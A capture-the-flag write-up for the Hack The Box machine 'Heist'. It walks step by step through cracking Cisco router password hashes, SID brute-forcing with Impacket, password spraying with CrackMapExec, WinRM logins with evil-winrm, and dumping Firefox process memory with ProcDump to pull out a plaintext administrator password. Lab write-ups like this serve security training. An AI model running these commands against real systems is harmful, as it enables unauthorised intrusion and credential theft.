Heist was a nice 20 point box created by MinatoTW. It started out with finding a Cisco router config file and cracking some hashes, enumerating more users and then logging in via WinRM to get the user flag. We then dumped the local Firefox processes with ProcDump, used some simple PowerShell for basic process dump analysis, found admin credentials and logged in again via WinRM to get root.
User.txt
Nmap
We start the box with a quick TCP nmap scan:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
# ports=$(nmap -sT -p- --min-rate=5000 --max-retries=2 10.10.10.149 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) &&
nmap -sV -sC -T4 -p$ports 10.10.10.149
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds?
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49668/tcp open msrpc Microsoft Windows RPC
HTTP
Navigating to http://10.10.10.149/ we come across a login page:
Clicking on ‘Login as guest’ leads us to issues.php which contains the following information:
Checking out the ‘Attachment’ on the first post by Hazard displays a config.txt file for their Cisco router:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
synchronization
bgp log-neighbor-changes
bgp dampening
network 192.168.0.0Â mask 300.255.255.0
timers bgp 3 9
redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
session-timeout 600
authorization exec SSH
transport input ssh
Hash Cracking
The config.txt file contains the following three hashes:
1
2
3
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
The number 7 next to the bottom two password hashes indicates that they are Cisco type 7 and can be easily decrypted at Cisco Password Cracker. The results are shown below:
The $1$pdQG$o8nrSzsGXeaduXrjlvKc91 hash can be cracked quickly with JohnTheRipper:
1
2
# john --wordlist=/root/rockyou.txt --rules hash
stealth1agent (?)
Credentials
From what we’ve gathered so far we can create a list of usernames and passwords we’ve found and cracked in the config.txt file:
1
2
3
Hazard / ??? - stealth1agent maybe?
rout3r / $uperP@ssword
admin / Q4)sJu\Y8qz*A3?d
Given that none of these credentials work on the first login screen we encountered on port 80, we can deduce that they are needed elsewhere in order for us to progress.
From our nmap scan we can see that SMB (445) and WinRM (5985) are both open, none of the creds succeded for WinRM but hazard / stealth1agent did work for SMB. However there wasn’t anything of use in any of the shares.
Lookupsid.py
Leveraging the lookupsid.py script from Impacket we’re able to enumerate for more users with Hazard’s SMB credentials.
A Windows SID brute forcer example through [MS-LSAT] MSRPC Interface, aiming at finding remote users/groups.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# python lookupsid.py heist/hazard:stealth1agent@10.10.10.149
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
Descriptions of each Impacket script can be found here.
CrackMapExec
As we’ve now got a lot more usernames to work with, we can use CrackMapExec to check if any of the new usernames can be used with the passwords we already possess in order to log into SMB. First we need to create a usernames file:
1
2
3
4
5
6
7
8
9
10
11
# cat usernames
Administrator
Guest
DefaultAccount
WDAGUtilityAccount
None
support
Chase
Jason
rout3r
admin
Secondly we create a passwords file with the three hashes inside:
1
2
3
4
# cat passwords
stealth1agent
$uperP@ssword
Q4)sJu\Y8qz*A3?d
All we have to do now is run the following CrackMapExec command:
We see Chase / Q4)sJu\Y8qz*A3?d was successful.
Evil-winrm
Since WinRM is open (5985) we can use evil-winrm to log in with these credentials:
1
2
3
4
5
6
7
# ./evil-winrm.rb -i 10.10.10.149 -u chase -p 'Q4)sJu\Y8qz*A3?d'
Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Chase\Documents> whoami
supportdesk\chase
Flag
All we have to do now is change directory and we get the user flag.
1
2
3
4
*Evil-WinRM* PS C:\Users\Chase\Documents> cd ..
*Evil-WinRM* PS C:\Users\Chase> cd desktop
*Evil-WinRM* PS C:\Users\Chase\desktop> cat user.txt
a127da...
Root.txt
Enumeration
During our usual enumeration we notice there are multiple Firefox processes running:
1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\Chase\desktop> Get-Process
Handles NPM(K) PM(K) WS(K) CPU(s) Id SI ProcessName
1233 68 106768 179916 27.86 2236 1 firefox
343 20 10056 37456 0.55 3164 1 firefox
408 31 17432 61252 2.02 4036 1 firefox
390 30 27464 59848 22.55 4348 1 firefox
358 26 16324 37588 0.47 6256 1 firefox
ProcDump
ProcDump is a tool we can use to dump the Firefox process data.
ProcDump is a command-line utility whose primary purpose is monitoring an application for CPU spikes and generating crash dumps during a spike that an administrator or developer can use to determine the cause of the spike. It also can serve as a general process dump utility that you can embed in other scripts.
Dumping Firefox Processes
Once you’ve downloaded ProcDump from the link in the previous section, we then need to upload it to Heist like so:
1
2
3
4
5
6
7
8
9
10
11
12
*Evil-WinRM* PS C:\Users\Chase\Documents> upload /root/Downloads/procdump.exe
Info: Uploading /root/Downloads/procdump.exe to .
Data: 868564 bytes of 868564 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\Chase\Documents> dir
Directory: C:\Users\Chase\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/28/2019 7:13 PM 651424 procdump.exe
With ProcDump successfully uploaded we can dump each Firefox process and then analyse the files for any sensitive information:
1
2
3
4
5
6
7
8
9
10
*Evil-WinRM* PS C:\Users\Chase\Documents> .\procdump.exe -accepteula -ma 6256
ProcDump v9.0 - Sysinternals process dump utility
Copyright (C) 2009-2017 Mark Russinovich and Andrew Richards
Sysinternals - www.sysinternals.com
[19:14:54] Dump 1 initiated: C:\Users\Chase\Documents\firefox.exe_191128_191454.dmp
[19:14:55] Dump 1 writing: Estimated dump file size is 280 MB.
[19:14:59] Dump 1 complete: 280 MB written in 5.0 seconds
[19:15:00] Dump count reached.
Process Dump Analysis
After dumping each process we can then use the PowerShell cmdlet Select-String to ‘grep’ through the dump file for specific words/patterns.
The Select-String cmdlet searches for text and text patterns in input strings and files.
Looking for instances of the string ‘admin’ we get the following information returned:
1
2
3
4
5
6
*Evil-WinRM* PS C:\Users\Chase\Documents> cat firefox.exe_191128_191454.dmp | Select-String -Pattern 'admin'
_DATA_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash ReportsMOZ_C¨^·(VœàšgÿP÷‚]CTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Crash
Reports\eventsMOZ_CRASHREPORTER_PING_DIRECTORY=C:\Users\Chase\AppData\Roaming\Mozilla\Firefox\Pending PingsMOZ_CRASHREPORTER_RESTART_ARG_0=C:\Program Files\Mozilla
Firefox\firefox.exeMOZ¨^·(VœGgÿGgÿRG_1=localhost/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ&login=MOZ_CRASHREPORTER_STRINGS_OVERRIDE=C:\Prog
ram Files\Mozilla Firefox\browser\crashreporter-override.iniNU
Removing all the junk we see a login request made by the admin with their username and password in clear text:
1
/login.php?login_username=admin@support.htb&login_password=4dD!5}x/re8]FBuZ
With these credentials we’re able to login via WinRM as Administrator.
1
2
3
4
5
6
7
# ./evil-winrm.rb -i 10.10.10.149 -u Administrator -p '4dD!5}x/re8]FBuZ'
Info: Starting Evil-WinRM shell v1.6
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
supportdesk\administrator
Flag
All we have to do now is change directory and we get root.
1
2
3
4
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\Administrator> cd desktop
*Evil-WinRM* PS C:\Users\Administrator\desktop> type root.txt
50dfa3...